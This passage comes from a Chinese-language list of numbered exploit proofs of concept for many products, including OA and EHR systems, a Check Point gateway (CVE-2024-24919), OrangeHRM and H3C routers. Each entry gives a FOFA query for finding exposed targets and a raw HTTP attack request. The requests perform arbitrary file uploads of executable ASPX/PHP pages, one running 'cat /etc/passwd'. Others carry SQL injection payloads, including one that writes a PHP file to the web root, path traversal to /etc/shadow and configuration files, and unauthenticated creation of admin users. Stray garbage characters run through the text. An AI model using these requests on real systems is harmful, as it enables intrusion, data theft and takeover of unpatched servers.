2 [( B1 v8 F4 Y1 \User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0- V* V7 R$ e a& i7 z" i
Connection: close; a) {. G9 z2 p1 z. Q$ S% `, [; N
Content-Length: 583
, C& u# @! T+ f& \9 |6 y/ D4 XContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryeegvclmyurlotuey
8 y$ m8 J) D+ R8 c$ QAccept-Encoding: gzip9 [2 g7 ?/ T6 t% H1 M) P0 Q1 P
2 Q ?! h! h' X) L% N+ J------WebKitFormBoundaryeegvclmyurlotuey
1 ?# @. }$ r. o$ }9 gContent-Disposition: form-data; name="fileToUpload"; filename="kjuhitjgk.aspx"- J) m+ o1 P/ A
Content-Type: application/octet-stream, k7 n' b) m5 |
. _$ l. |0 u1 \& ^6 c4 h<% response.write("ujidwqfuuqjalgkvrpqy") %>( F/ }% n" ? @) {" P
------WebKitFormBoundaryeegvclmyurlotuey3 U6 z9 U; k) X1 O' y b* I
Content-Disposition: form-data; name="action". l3 K# h! T# s) |& ?9 B
. [% A' r; ?. @; L3 C; S1 Lupload- v% ^. k% H8 q3 H3 ~$ B
------WebKitFormBoundaryeegvclmyurlotuey
/ e. Z# [ F* h# U- _Content-Disposition: form-data; name="responderId"
) ~$ \! ]6 S1 ?6 v9 z- [/ M+ b& M
ResourceNewResponder$ V" f, v- A% S9 `% F
------WebKitFormBoundaryeegvclmyurlotuey
5 j5 S1 h- f% X) N* ]9 S) j/ YContent-Disposition: form-data; name="remotePath"
: j' E, o" C3 X5 I$ Y7 \
$ _5 p, C5 n* z9 G/opt/resources
. V* M |6 H1 |------WebKitFormBoundaryeegvclmyurlotuey--
. C7 y/ E- T% R1 o$ q: |# o2 P; F% v1 K. P+ X2 d- O
. _* l. Z) h" N5 z( U9 v1 I2 i p
http://x.x.x.x/opt/resources/kjuhitjgk.aspx
9 W! }% P+ B2 q4 [3 h1 F
/ }1 n# a. ]' Q2 @ d163. 号卡极团分销管理系统 ue_serve.php 任意文件上传& x7 [6 J! M9 c
FOFA: icon_hash="-795291075"6 z. n o# E/ a9 n( Z" J/ B9 Y
POST /admin/controller/ue_serve.php?action=image&encode=utf-8 HTTP/1.1& r1 p3 d% C+ U- p8 r$ a' e4 I; k
Host: x.x.x.x
' u2 f7 }/ E: IUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
7 N5 i3 l* f8 ]' c9 c% zConnection: close! k' e; {' B- s7 f# @' V, x
Content-Length: 293
0 f N: G9 z, p: RAccept: */*( _' H# g# C7 a9 }
Accept-Encoding: gzip, deflate
3 a! x* ]# ~' H+ m6 L4 K2 V! b2 YAccept-Language: zh-CN,zh;q=0.9
% |) u3 x+ I9 H+ O1 W6 cContent-Type: multipart/form-data; boundary=----iiqvnofupvhdyrcoqyuujyetjvqgocod. t" ~: O' H+ c, ?7 V, o
3 f w% y. a& Z, ~- @" A" z k
------iiqvnofupvhdyrcoqyuujyetjvqgocod
: R6 T- F3 v% P/ e, O6 LContent-Disposition: form-data; name="name"
& _8 J* p( L' b: N1 q+ k5 z4 l
: f$ _ A* ?; g( t1.php1 B( u9 D" u" |$ c3 l1 n
------iiqvnofupvhdyrcoqyuujyetjvqgocod
7 { @. W% U8 r) ]. Z# k( CContent-Disposition: form-data; name="upfile"; filename="1.php") |$ x, a$ A. N5 A8 y+ `5 V* `
Content-Type: image/jpeg
. f1 Z* |7 }4 F. w
) l0 H1 C# i9 y$ \, Frvjhvbhwwuooyiioxega
3 E5 p4 S8 G2 N1 U0 [6 w------iiqvnofupvhdyrcoqyuujyetjvqgocod--0 C0 A$ t# s( A: n+ O7 F& D& u
0 w) n& @; X) ^: y3 x; S, d) i- [: t
164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx 任意文件上传
# n9 j/ L# R/ K( u' WFOFA: title="智慧综合管理平台登入"( ^- z* x; r2 s5 W, w; G
POST /Module/FileUpPage/FileUpProductupdate.aspx HTTP/1.1
: o; Q0 ?* x# E' _1 DHost: x.x.x.x
0 V3 S& Q0 e# y. OUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
f1 S8 w; P6 h8 i; uContent-Length: 288
9 j% q& O( i7 }% LAccept: application/json, text/javascript, */*; q=0.01
: O* P5 k* C* U7 T. U% ^$ }' V8 |Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2,& p5 R2 c; e7 z. A: t9 C' S
Connection: close
& F5 `9 I Z7 R0 gContent-Type: multipart/form-data; boundary=----dqdaieopnozbkapjacdbdthlvtlyl
/ Z* i1 v5 q- M' Y7 i7 q* oX-Requested-With: XMLHttpRequest
+ ~1 `! I( `: P2 d% P/ U8 t( xAccept-Encoding: gzip: M- Z- p* P3 f. ?; ~
+ K# w* F# J' r' q% i3 Z- t% ?------dqdaieopnozbkapjacdbdthlvtlyl& R. m3 K8 G2 M
Content-Disposition: form-data; name="Filedata"; filename="qaz.aspx"
; H2 Y9 ?. l; V9 ?, _ XContent-Type: image/jpeg
1 Z( ]; X7 N* p, L6 o
4 r, ^6 i0 h$ M: U- R3 y<%@Page Language="C#"%><%Response.Write("aitwpovoxwtgixpfqiys");System.IO.File.Delete(Request.PhysicalPath);%>1 g- |) D5 V" l+ Z/ ]
------dqdaieopnozbkapjacdbdthlvtlyl--6 O* w* q5 Q0 [; d* s
+ G& w+ ]& l: q4 e3 j2 U: s" _$ W
+ C0 f$ [1 ^: j& `8 Uhttp://x.x.x.x/Upload/Publish/000000/0_0_0_0/update.aspx
9 k. U, n5 W) \8 { k: o6 N) u1 o4 b2 S; U; L
165. OrangeHRM 3.3.3 SQL 注入% }4 `/ l( @( F- s& |+ p% Z
CVE-2024-36428
3 a8 f( q5 J, ] HFOFA: app="OrangeHRM-产品"
' Y. x2 x. T7 C3 k" a ?URL:https://192.168.1.28/symfony/web ... e&sortOrder=ASC,(SELECT (CASE WHEN (5240=5240) THEN 1 ELSE 5240*(SELECT 5240 FROM INFORMATION_SCHEMA.PLUGINS) END))" W( E8 f6 x/ L4 a! d
3 d3 [3 ]& a; h& ^% Y" p
( @( r3 `; Z2 N166. 中成科信票务管理平台SeatMapHandler SQL注入
* u; `+ {5 d% g6 vFOFA:body="技术支持:北京中成科信科技发展有限公司"1 n3 y5 P2 c* x' G/ n+ X# q: T" v
POST /SystemManager/Comm/SeatMapHandler.ashx HTTP/1.1
0 `1 F( n' c- }6 m( A: ^Host:. a1 K4 B! s" ]$ ?* E2 ]+ d
Pragma: no-cache# v3 O3 D! z/ o" Q* n
Cache-Control: no-cache
* ]7 ]9 f ~/ M3 f A) ?Upgrade-Insecure-Requests: 11 ?# N% {) p. ~/ n0 E) S& o
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
# W! E B* n4 {Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7) b5 E. K- v$ E0 U- t& W: ~
Accept-Encoding: gzip, deflate
' E3 t% a2 \, a! ~Accept-Language: zh-CN,zh;q=0.9,en;q=0.86 s5 b# _* w: H! S# |
Cookie: ASPSESSIONIDCCRBRCTD=LHLBDIBAKDEGBCJGKIKMNODE; @/ z9 G9 P, G. f) W9 N5 n3 F: Q
Connection: close
2 D# `) f& _) _# d- TContent-Type: application/x-www-form-urlencoded
; L3 i3 E r2 @2 R; {! k& f& [4 UContent-Length: 89$ C/ l- z4 z: I) F
, `9 p; r' X8 c" r' j" ?% b4 c& u
Method=GetZoneInfo&solutionNo=%27+AND+4172+IN+%28SELECT+%28CHAR%28104%29%2BCHAR%28101%29%2BCHAR%28108%29%2BCHAR%28108%29%2BCHAR%28111%29%29%29--+bErE
& ?& H' J: D6 g6 M$ c6 B* @0 Q- @" \6 A% u7 h
. }$ U' Q ^7 ~167. 精益价值管理系统 DownLoad.aspx任意文件读取( W% L* }, N) L. ^ n
FOFA:body="/ajax/LVS.Core.Common.STSResult,LVS.Core.Common.ashx"
0 d( j/ L4 j, d' Z* t, uGET /Business/DownLoad.aspx?p=UploadFile/../Web.Config HTTP/1.17 u# W% S; J6 H( K$ ]
Host:
7 P4 V5 M5 l0 J7 T6 ~User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
* C/ k1 _* j- L" w% J* `Content-Type: application/x-www-form-urlencoded/ m2 ^( J: F( w2 h$ \- z
Accept-Encoding: gzip, deflate- A' A7 g/ i# _5 x, g$ h* ]& [
Accept: */*6 h: C: u8 Z7 \% K
Connection: keep-alive3 O0 ?2 H9 f: O: z) Q
% Y) d$ a+ |- V1 |8 {, K
& U8 _9 Q7 E" O0 w; j
168. 宏景EHR OutputCode 任意文件读取; ]4 q, ?+ [! P7 L( Q$ d
FOFA:app="HJSOFT-HCM"
" [3 A- D2 g+ [5 z. E, c( U. R2 dGET /servlet/OutputCode?path=VHmj0PAATTP2HJBPAATTPcyRcHb6hPAATTP2HJFPAATTP59XObqwUZaPAATTP2HJBPAATTP6EvXjT HTTP/1.1- c2 R; s" c/ n' F) B J
Host: your-ip
m2 l6 j' ^' o/ }* i1 s+ |9 tUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.363 r6 S6 |' l6 d& O5 H
Content-Type: application/x-www-form-urlencoded
& R) \, @4 i5 E7 x6 C% F2 w, ]Connection: close
8 e: W/ v1 G' D! F4 U/ o w% G S& f. `3 Y; x% ?( P, s# d/ \* ~: L
% L7 D/ T* A/ t/ ]9 R
$ P- K" {; C5 s* `3 _# W8 N
169. 宏景EHR downlawbase SQL注入" Q' U5 q8 H: D. ?
FOFA:app="HJSOFT-HCM"3 a5 u) m2 m2 x: f, p
GET /templates/attestation/../../selfservice/lawbase/downlawbase?id=1';WAITFOR+DELAY+'0:0:5'--+ HTTP/1.1- d) L0 _4 V: N' X0 t. t
Host: your-ip
$ |6 q0 w3 A, C# U$ tUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
^$ L5 C4 r5 o4 mAccept: */*
( p S* {, E. a @% D x- f% p% t1 q& DAccept-Encoding: gzip, deflate
! p/ S/ Q8 x: s$ y, M0 W# aConnection: close
/ K \/ f1 t# }+ k1 C
3 Q& ?# `8 y6 ^2 \; v; u$ A
( r, O" T, Q1 {/ }1 j, T! u- I) d* m
170. 宏景EHR DisplayExcelCustomReport 任意文件读取2 C2 }2 R& E; ?8 d* q0 s! f
FOFA:body="/general/sys/hjaxmanage.js"/ Q4 C; K& L! ] l: d
POST /templates/attestation/../../servlet/DisplayExcelCustomReport HTTP/1.1
2 @5 W, n5 y. S7 {Host: balalanengliang
. o! c8 C; X; ]7 C2 JUser-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.364 H" y ?& T; S
Content-Type: application/x-www-form-urlencoded
b% b- O- u+ e! ?' ^8 g
7 v& h4 f% b8 ]+ u* B f4 @filename=../webapps/ROOT/WEB-INF/web.xml3 u, R; P# C0 {4 [$ `. p9 o+ E; X
& ?* }0 T7 I+ O) n3 k4 k( [, m' I' m0 ~5 k4 ~
171. 通天星CMSV6车载定位监控平台 SQL注入
# U* \& T( |1 N! ^ u/ ~ oFOFA:body="/808gps/"
$ {2 H5 _$ F. Z1 a# \9 jGET /run_stop/delete.do;downloadLogger.action?ids=1)+AND+(SELECT+5394+FROM+(SELECT(SLEEP(5)))tdpw)--+&loadAll=1 HTTP/1.1& H2 U0 W# t* ^* R
Host: your-ip, x" h3 D3 d$ _$ O7 [* N* J( X
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0& E$ W! Q* C }) A# L/ L/ N4 R% E; r7 g: U
Accept: */*% ~; L- p( R( |4 B5 I2 `
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
- W% y9 V4 i0 Y; u5 F; ~2 R1 pAccept-Encoding: gzip, deflate
: g4 e' I% \6 X: \) a8 Z" iConnection: close3 J4 N' `, k b+ v- N) w
$ R3 v, ^4 W4 k9 @. Y
1 A0 u) H; R7 v$ [) U3 @
" }5 x6 L0 X6 J" R) a172. DT-高清车牌识别摄像机任意文件读取7 J# j) b. R: P
FOFA:app="DT-高清车牌识别摄像机"! H9 s9 C) e6 q$ I& q$ I! E# E
GET /../../../../etc/passwd HTTP/1.1
' T$ K+ c* |- I+ g4 U5 `2 wHost: your-ip
9 t: G6 o. A! G* M5 I" l& SUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36; R1 N+ `+ @. Q% k3 \" D# h; p
Accept-Encoding: gzip, deflate
, v/ ]/ w4 `9 Y# j) WAccept: */*) m1 t* o% {, `% U
Connection: keep-alive& X8 A- P y( u1 H+ c' f
' f& m+ t+ [" Q* ^
" m& G# o( J( Q, N, G" v! T4 [
* f) {. C- |) Q( `3 `9 l173. Check Point 安全网关任意文件读取
) F( S- f; C( b. x% I/ N4 E! ACVE-2024-24919
, L# A' t `- L, Q3 ^# \FOFA:app="Check_Point-SSL-Network-Extender"
9 a) Y4 m9 d# Q {3 YPOST /clients/MyCRL HTTP/1.1
/ Z& q+ x5 I9 R- O* UHost: your-ip3 ~$ y E7 r; \/ i8 Q2 V% G
Content-Type: application/x-www-form-urlencoded: x8 t5 r7 w+ @
- }9 C. x3 Y5 V
aCSHELL/../../../../../../../etc/shadow
5 {+ G) H, c8 |$ W3 E* ?( D6 U ?3 t! @- A! N1 ^
- ~0 T( B5 _. i& {: q
Z8 G& a" M' H174. 金和OA C6 FileDownLoad.aspx 任意文件读取
O) X; |( l; u/ `FOFA:app="金和网络-金和OA"
: u- L4 v0 R& p! M7 F: w1 @, \GET /c6/JHSoft.Web.CustomQuery/FileDownLoad.aspx?FilePath=../Resource/JHFileConfig.ini HTTP/1.1
8 t1 V ^1 ?+ ? h' l" f" QHost: your-ip
# M1 @/ c6 X6 o) ~* ^. jUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
5 Z/ u! Z" n5 W5 V% TAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
) i. T: \+ x1 X- n. N' h: N$ ]Accept-Encoding: gzip, deflate, br4 I/ `2 J1 H3 ^$ Q/ o% q
Accept-Language: zh-CN,zh;q=0.9. U9 s% T7 O* a) t: X1 Y/ b! Z
Connection: close- J, P y5 B" }7 I
1 e2 i6 r) K9 V" W6 s* W( m9 x
1 J* L- N+ l' {! }4 r) m# D/ s! @# n) W1 g5 G
175. 金和OA C6 IncentivePlanFulfill.aspx SQL注入/ T; b: O$ @: h$ ?% d8 q$ E
FOFA:app="金和网络-金和OA"
) U, O6 ^1 E6 H1 F1 z$ _GET /C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfill.aspx/?IncentiveID=1%20WAITFOR%20DELAY%20'0:0:5'--&TVersion=1 HTTP/1.1
2 C) ?3 _. j% H1 b- qHost:
+ a/ K; O8 U$ ~, X0 j4 JUser-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
* P4 z% \0 E) nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 u0 R3 F8 E/ u( S; r) E8 [
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2. t5 e. l$ W4 F8 q# I S, S
Accept-Encoding: gzip, deflate
( R. E% z6 \9 R& M f( \- {. UConnection: close- Y4 P; u$ p, J6 X1 v4 ^/ i# @0 j
Upgrade-Insecure-Requests: 1
0 D' J+ e' S% q) t+ E- R, p6 q: f0 t" b( Y
5 H8 K: N- l) O. a' e# i) y* @
176. 电信网关配置管理系统 rewrite.php 文件上传9 T) ~( x$ V/ N9 a6 O: |0 U* w
FOFA:body="img/login_bg3.png" && body="系统登录"% R- A4 ~" O: O! `
POST /manager/teletext/material/rewrite.php HTTP/1.14 B2 o& S# q1 |7 L0 u- a
Host: your-ip: e" s6 k4 m! k, D/ i7 G, O
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.05 E8 O# u3 d) ]; R, Z
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryOKldnDPT. A8 x/ M% x1 _9 a9 W
Connection: close
# B: g7 l: d6 \: G% p+ @7 ^* }
0 p/ H* L0 i) I% Z7 G. V------WebKitFormBoundaryOKldnDPT
) o7 V5 ~4 Z Y3 |( E- N6 SContent-Disposition: form-data; name="tmp_name"; filename="test.php"
/ |( G8 A4 ?% r. W& p' lContent-Type: image/png
# V/ H v! _/ h9 H5 } ( `3 @5 u- C2 h
<?php system("cat /etc/passwd");unlink(__FILE__);?>
; L/ I2 c3 a* G- |6 V2 e------WebKitFormBoundaryOKldnDPT' A5 j+ h( y5 G0 @
Content-Disposition: form-data; name="uploadtime"
) i2 ~* D/ H' R/ k2 m2 u) w / ]- U/ w8 K8 K
. M$ u+ b( s7 B% m( u" X: D) P& f
------WebKitFormBoundaryOKldnDPT--" V0 k1 U! Y' D2 e3 C; y) \* ~! s4 O
! J% T; E x$ }. V1 l9 Y1 I6 e6 ]( C! d: _
4 d7 k" q$ x9 P: b
177. H3C路由器敏感信息泄露- t, E" x0 r+ g% u$ P; V" r
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
- w) e4 v7 \4 Y6 q5 M5 X! \! ?/userLogin.asp/../actionpolicy_status/../M60.cfg
2 f. _5 K1 F: ^8 O z/userLogin.asp/../actionpolicy_status/../GR8300.cfg3 n# q) k, F/ c5 ^" V
/userLogin.asp/../actionpolicy_status/../GR5200.cfg
( c, T/ z' J7 i+ F: D! W7 [/userLogin.asp/../actionpolicy_status/../GR3200.cfg
( |4 D$ p7 V% u6 `/userLogin.asp/../actionpolicy_status/../GR2200.cfg
- n6 f4 S7 H2 W& ^/userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg
: u1 P W5 l# V* M+ P/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg4 @8 S2 l5 B: ~8 N
/userLogin.asp/../actionpolicy_status/../ER6300G2.cfg( W; s1 U% \4 X3 z
/userLogin.asp/../actionpolicy_status/../ER5200G2.cfg
* W, p' g! N1 ]4 ~8 V2 n* O/userLogin.asp/../actionpolicy_status/../ER5200.cfg
0 G. v/ ~8 S. X3 {/userLogin.asp/../actionpolicy_status/../ER5100.cfg
2 B5 m$ l( R2 I8 @4 g/userLogin.asp/../actionpolicy_status/../ER3260G2.cfg" S \4 [5 n8 a" F2 {; i
/userLogin.asp/../actionpolicy_status/../ER3260.cfg" L) `, i" W' P. T+ L
/userLogin.asp/../actionpolicy_status/../ER3200G2.cfg x: w( D! L4 Y' p$ H1 d% P; F, k
/userLogin.asp/../actionpolicy_status/../ER3200.cfg2 l: X6 x: b6 t- W! I, J5 ^ Z# Z
/userLogin.asp/../actionpolicy_status/../ER3108GW.cfg7 J) J! C6 F5 |3 D9 }$ w" U
/userLogin.asp/../actionpolicy_status/../ER3108G.cfg: R+ a0 G( y. @4 v( H5 C& i
/userLogin.asp/../actionpolicy_status/../ER3100G2.cfg# }6 C. U( G0 T4 i4 V& c
/userLogin.asp/../actionpolicy_status/../ER3100.cfg
/ r" @0 u8 p6 |! {1 m1 i4 ]: ~' G9 F2 A/userLogin.asp/../actionpolicy_status/../ER2200G2.cfg* k) v _5 y7 f1 y7 W$ ]7 ~5 X6 m5 u
b$ ?* J: f/ F) q5 L- m/ |
5 t$ X1 k4 q5 R( z# m O. O3 ?178. H3C校园网自助服务系统-flexfileupload-任意文件上传
/ k$ | J" V! ^FOFA:header="/selfservice"% T5 h4 P5 K* g. M+ \
POST /imc/primepush/%2e%2e/flexFileUpload HTTP/1.1
7 o. Z4 j R- ?( p% q9 C2 N3 i" jHost:
( N& k$ G" }" q7 `User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
; p% z' ^- [! v. FContent-Length: 252
- _) ~. N- S2 D$ GAccept-Encoding: gzip, deflate" s. I" G! D& M/ \- b
Connection: close1 R _1 a8 B0 z$ a! ~# f' ~
Content-Type: multipart/form-data; boundary=---------------aqutkea7vvanpqy3rh2l+ w! \% V' v# c; e- ^
-----------------aqutkea7vvanpqy3rh2l
& d. p9 Z2 J2 {% s6 ]2 ZContent-Disposition: form-data; name="12234.txt"; filename="12234"5 x7 R! y" d2 V j4 Y
Content-Type: application/octet-stream) b/ r0 X$ b7 O1 D7 I% S
Content-Length: 255! |5 M' J3 \$ ~" r {- `
) ?8 b& Q- Q8 X) ~12234
7 \- P1 Y, ?6 d0 [ C7 n-----------------aqutkea7vvanpqy3rh2l--! H. K3 u; H: r% `. a W2 f2 ]- H
( e1 l9 X9 U! A& V" \& q
+ r1 _# W2 x+ b W6 L5 `GET /imc/primepush/%2e%2e/flex/12234.txt g( y" |# c0 `) o( z+ X
$ p8 [8 w/ j5 Z8 Y; B* ]
! K0 |2 f! V# ~$ V" w179. 建文工程管理系统存在任意文件读取
6 F4 R2 o5 m8 t: Y; {$ oPOST /Common/DownLoad2.aspx HTTP/1.1
. n- \5 Q8 j( z+ u; T: f/ r4 W( lHost: {{Hostname}}( N. U7 e, q% k
Content-Type: application/x-www-form-urlencoded0 l8 d9 @& B/ J6 M. J% S% Y$ i* g4 @" N
User-Agent: Mozilla/5.0) r- |, g) z: B( Z, x
8 I) b* i/ \, N3 j& ^
path=../log4net.config&Name=! [1 }. w! L5 O, ?
, |! Z3 w# t6 K% `; c$ C9 [ }, A/ g* \4 H2 ?6 F/ n4 u
180. 帮管客 CRM jiliyu SQL注入
& o( r Y8 E+ N. pFOFA:app="帮管客-CRM"( ^2 O' }' U- C3 ^" h
GET /index.php/jiliyu?keyword=1&page=1&pai=id&sou=soufast&timedsc=激励语列表&xu=and%201=(updatexml(1,concat(0x7e,(select%20user()),0x7e),1)) HTTP/1.1
. r' G6 Q* T* i; UHost: your-ip
/ q+ }# I! [+ x2 w& _3 IUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.361 v) g( w" u- I9 u- a3 \
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7, o! C( c5 V8 v
Accept-Encoding: gzip, deflate
0 K3 Z0 O1 s" MAccept-Language: zh-CN,zh;q=0.9
" i& \( U) C( }" pConnection: close. \* b6 n2 j$ G' z' u" [* J
( d& S: h7 W% x; j2 J) ^9 Q7 A
8 X, a8 i- i/ D! L# J3 h; x181. 润申信息科技企业标准化管理系统 UpdataLogHandler.ashx SQL注入
8 q5 F, Q1 ? WFOFA:"PDCA/js/_publicCom.js"
D5 y( N3 H6 V( u* y+ v! ?POST /PDCA/ashx/UpdataLogHandler.ashx HTTP/1.1
; T2 r- W! R" m9 A" r+ b bHost: your-ip: T5 a$ |: I: t# A
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
3 P% {4 ?) g/ q2 B0 NAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
) @' k [, {: _& `Accept-Encoding: gzip, deflate, br
6 _1 \7 X" d$ u9 v9 _* E" W# JAccept-Language: zh-CN,zh;q=0.95 i O% S- c. m% D, J) @& g; _
Connection: close5 i6 \; ?$ n+ Y0 F4 ^
Content-Type: application/x-www-form-urlencoded
( x' F2 H- ]( s2 Q a; ^1 x9 [" f3 b% g* n" }6 j- e8 ~
1 }' u2 L* Y' X, L" T. q
action=GetAll&start=' WAITFOR DELAY '0:0:5'--&end=&code=11&type=2&page=1&rows=20! z7 h; e' }; n9 }9 f5 s8 ~/ Y
@2 x9 @" g; u8 |% C8 Z, G
# h# |( a! C. y+ _* i
182. 润申科技企业标准化管理系统AddNewsHandler.ashx 任意用户创建4 z- ?3 S' J3 S: v2 s; L% n4 e$ b, ~
FOFA:"PDCA/js/_publicCom.js"
3 Y# @$ V" n8 n, R' F) v& s$ JPOST /PDCA/ashx/AddNewsHandler.ashx?action=Adduser HTTP/1.1
5 f8 h. T8 V1 ~3 j" FHost: your-ip0 C$ a+ u& f) A7 m" K1 x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
^ q' `3 N9 W+ U- |Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
9 g% }7 Y) G' o" WAccept-Encoding: gzip, deflate, br
) d$ e; S1 {/ m+ b4 t( LAccept-Language: zh-CN,zh;q=0.9
( k* o1 p# U5 R5 @Connection: close* y, _! L- r. Q, _' ~& X: f v
Content-Type: application/x-www-form-urlencoded
# g/ s1 R5 ^) c# h1 a# \/ J% ?: B, U6 F3 z! W
3 W* x( R, }3 A8 f2 F+ c
username=test1234&pwd=test1234&savedays=1- T3 F4 P; L6 ^) d
- I( _# X- O8 `' ]
8 q3 ^' M: Z$ R1 A% H& Y183. 广州图创图书馆集群管理系统 updOpuserPw SQL注入
( t3 [( `0 Z* _# E# yFOFA:body="interlib/common/" || body="Interlib图书馆集群管理系统" || body="/interlib3/system_index" || body="打开Interlib主界面"4 S; {; k: c; a. P Y
GET /interlib3/service/sysop/updOpuserPw?loginid=admin11&newpassword=Aa@123456&token=1%27and+ctxsys.drithsx.sn(1,(select%20111111*111111%20from%20dual))=%272 HTTP/1.1" }+ f" k0 S) Z2 F `% ^7 I
Host: your-ip7 C( ^+ o7 t; i, E; }3 N2 M
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36! T T6 Y- [3 p# K
Accept-Charset: utf-8
* @7 R6 N3 k; [! B) L) @- aAccept-Encoding: gzip, deflate
1 p# q( \$ }' y0 P8 M7 vConnection: close
% G5 L, @- L; `" m2 s
3 Z2 h3 y3 z# W! D* u T, M+ `$ H0 q
4 q. d. Q \$ Q, ]5 B& [184. 迅饶科技 X2Modbus 网关 AddUser 任意用户添加( V- [8 t- d% B9 Z. N5 Y4 {
FOFA:server="SunFull-Webs"
4 O% C8 U* Y, c kPOST /soap/AddUser HTTP/1.1: y+ a1 n! g8 s9 r4 u
Host: your-ip
, i0 b2 m0 ]: k( AAccept-Encoding: gzip, deflate
7 F5 r' V1 U. W4 m1 Z) EUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0* {% @4 j/ ]- A9 d
Accept: application/xml, text/xml, */*; q=0.01& b, |, S5 W' l
Content-Type: text/xml; charset=utf-8
l7 K9 v. c' lAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2+ n1 I6 D' t; B$ i3 B3 I o3 H
X-Requested-With: XMLHttpRequest+ ^- a$ y. S0 v3 y
$ W- }; L9 j$ R, `) h$ h7 k7 w" j. q; F- X, ^
insert into userid (USERNAME,PASSWORD,PURVIEW,LOGINDATE,LOGINTIME) values('root','123456','4','2024-5-6','11:7:56')
7 i7 U. I6 v- I% y8 O' \) k4 T
4 ?3 a, p: l# K* @5 j; x* R
2 r r6 G2 [$ G4 l0 }, H9 o; j+ |185. 瑞友天翼应用虚拟化系统SQL注入- Z% C& l8 O: i: N3 @6 @7 m+ Z
version < 7.0.5.10 S% t" K7 @/ s: H
FOFA:app="REALOR-天翼应用虚拟化系统"
6 H: @6 M* ?& I4 B2 x! W4 @GET /index.php?s=/Admin/appsave&appid=3%27%29%3Bselect+unhex%28%273c3f706870206563686f206d643528223122293b202466696c65203d205f5f46494c455f5f3b20756e6c696e6b282466696c65293b%27%29+into+outfile+%27.%5C%5C..%5C%5C..%5C%5CWebRoot%5C%5Cplom.xgi%27%23 HTTP/1.14 ?3 }! D& D) F0 k g
Host: host
* P" q7 u) Q) P2 I5 t. F8 y
7 k, G7 b+ d; R$ l- T, w- e+ }3 F
/ t" @9 j$ b$ j, F186. F-logic DataCube3 SQL注入8 A8 Z3 _% E9 c' a/ q
CVE-2024-31750
+ z3 L+ o$ K1 m; \, Y* cF-logic DataCube3是一款用于光伏发电系统的紧凑型终端测量系统% _1 ~' ]6 x2 N3 ?
FOFA:title=="DataCube3". {" b0 m% ]7 X. ]
POST /admin/pr_monitor/getting_index_data.php HTTP/1.1
